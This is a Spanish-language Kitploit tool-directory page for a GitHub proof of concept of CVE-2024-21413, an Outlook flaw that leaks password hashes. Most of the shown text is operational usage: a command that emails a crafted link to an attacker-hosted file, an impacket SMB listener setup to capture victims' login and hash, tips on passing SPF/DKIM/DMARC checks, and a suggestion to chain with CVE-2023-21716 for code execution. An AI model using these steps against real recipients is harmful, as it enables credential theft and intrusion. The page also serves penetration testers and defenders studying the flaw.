Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-21413-POC — Vulnerabilidad de divulgación de información en Microsoft Outlook (fuga de hash de contraseña) - CVE-2024-21413 POC | Kitploit
Herramientas/GitHubGitHub/r00tb1t/cve-2024-21413-poc
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónAprendizaje y EducaciónSeguridad de Correo Electrónico
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

Vulnerabilidad de divulgación de información en Microsoft Outlook (fuga de hash de contraseña) - CVE-2024-21413 POC

Ver Repositorio
172hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-21413 - POC

Uso:

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : es el archivo de prueba compartido (word en este caso) desde la máquina del atacante (xx.xx.xx.xx).

Para garantizar el cumplimiento de SPF, DKIM y DMARC, utiliza una $IP y un dominio legítimos.

Asegúrate de instalar la librería pexpect si aún no lo has hecho usando pip install pexpect.

Consejos para ejecutar el POC:

  • Ejecuta un listener smb impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
  • Ejecuta el POC

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • Haz clic en el enlace del correo recibido y, BOOM, deberías recuperar el login y el hash en el listener
  • encadena este CVE con CVE-2023-21716 para obtener RCE !!!
  • Kudooooos y detalles sobre CVE-2024-21413 .
  • Solución alternativa/Corrección:

[!CAUTION] ⚠️ Descargo de responsabilidad: IMPORTANTE: Este script se proporciona SOLO con fines educativos, de pruebas éticas y de uso legítimo. No lo utilices en ningún sistema o red sin permiso explícito. El acceso no autorizado a sistemas informáticos y redes es ilegal, y los usuarios que sean sorprendidos realizando actividades no autorizadas estarán sujetos a acciones legales. El autor NO es responsable de ningún daño causado por el mal uso de este script..

Descargar herramienta